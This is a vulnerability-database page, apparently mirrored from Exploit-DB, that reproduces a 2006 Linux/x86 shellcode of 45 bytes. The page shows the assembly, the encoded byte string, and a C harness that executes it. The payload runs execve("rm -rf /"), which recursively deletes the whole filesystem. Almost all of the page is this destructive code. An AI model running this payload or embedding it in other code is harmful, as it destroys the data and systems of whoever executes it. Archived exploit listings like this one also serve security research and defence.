Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056070 漏洞类型
发布时间 2006-11-17 更新时间 2006-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13352
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* By Kris Katterjohn 11/18/2006
 *
 * 45 byte shellcode to execve("rm -rf /") for Linux/x86
 *
 *
 *
 * section .text
 *
 *   global _start
 *
 * _start:
 *
 * ; execve("/bin/rm", { "/bin/rm", "-r", "-f", "/", NULL }, NULL)
 *
 *   push byte 11
 *   pop eax
 *   cdq
 *   push edx
 *   push byte 0x2f
 *   mov edi, esp
 *   push edx
 *   push word 0x662d
 *   mov esi, esp
 *   push edx
 *   push word 0x722d
 *   mov ecx, esp
 *   push edx
 *   push 0x6d722f2f
 *   push 0x6e69622f
 *   mov ebx, esp
 *   push edx
 *   push edi
 *   push esi
 *   push ecx
 *   push ebx
 *   mov ecx, esp
 *   int 0x80
 */

main()
{
    char shellcode[] =
        "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
        "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
        "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";

    (*(void (*)()) shellcode)();
}

// milw0rm.com [2006-11-17]